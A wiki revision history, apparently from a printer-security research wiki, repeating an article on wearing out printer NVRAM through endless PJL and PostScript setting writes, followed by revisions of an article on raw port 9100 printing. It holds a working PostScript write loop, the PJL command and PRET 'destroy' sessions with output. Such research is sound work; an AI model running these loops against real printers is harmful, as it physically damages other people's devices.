NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- e6bf12f5569dfa0513df1612cd4d7815e8dc3d42 112 107 2017-01-14T17:41:42Z 134.147.128.156 0 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- b6940a368b5f54137d1569358642927be0fe5fee 107 106 2017-01-14T14:35:11Z 77.182.234.10 0 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- aa3b03cbb11c8b4a87d474b93547ad364da423e0 106 105 2017-01-14T14:34:25Z 77.182.234.10 0 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going..." NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 54d608183e136f3d9240f6230d86dffa2a3c6c71 105 2017-01-12T10:44:32Z 78.49.97.12 0 Created page with "Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is..." wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! I'm afraid. I'm afraid, Dave. Dave, my mind is going..." NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- b739584b5a097709d5267755cb21902d3e7a94f2 0 29 620 368 2017-03-24T12:02:21Z Admin 1 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as ‘the simplest, fastest, and generally the most reliable network protocol used for printers’ <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of February 2017, the Shodan search engine [https://www.shodan.io/search?query=port:9100+pjl reveals] 48,213 printing devices '''Internet-accessible''' trough port 9100. [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc.</ref> compatible mobile apps, or they automatically connect to an access point provided by the attacker with a "default" SSID <ref>''[https://www.pwnieexpress.com/blog/rogue-device-spotlight-wireless-printers Rogue Device Spotlight: Wireless Printers]'', Robert Awk, Pwnie Express Blog</ref>. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- cef93649a5661cb70899013d670d3965547d7629 368 329 2017-02-05T19:35:21Z 134.147.128.156 0 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as ‘the simplest, fastest, and generally the most reliable network protocol used for printers’ <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of February 2017, the Shodan search engine [https://www.shodan.io/search?query=port:9100+pjl reveals] 48,213 printing devices '''Internet-accessible''' trough port 9100. [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 0ed2bb951a59cc22f13db705aa84d71bc6bf2f0e 329 303 2017-01-31T15:44:40Z Admin 1 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as ‘the simplest, fastest, and generally the most reliable network protocol used for printers’ <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below: [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 23760b9d4161c025350589e18cdbc6a996da7bed 303 260 2017-01-31T08:05:44Z 84.153.135.37 0 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below: [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to 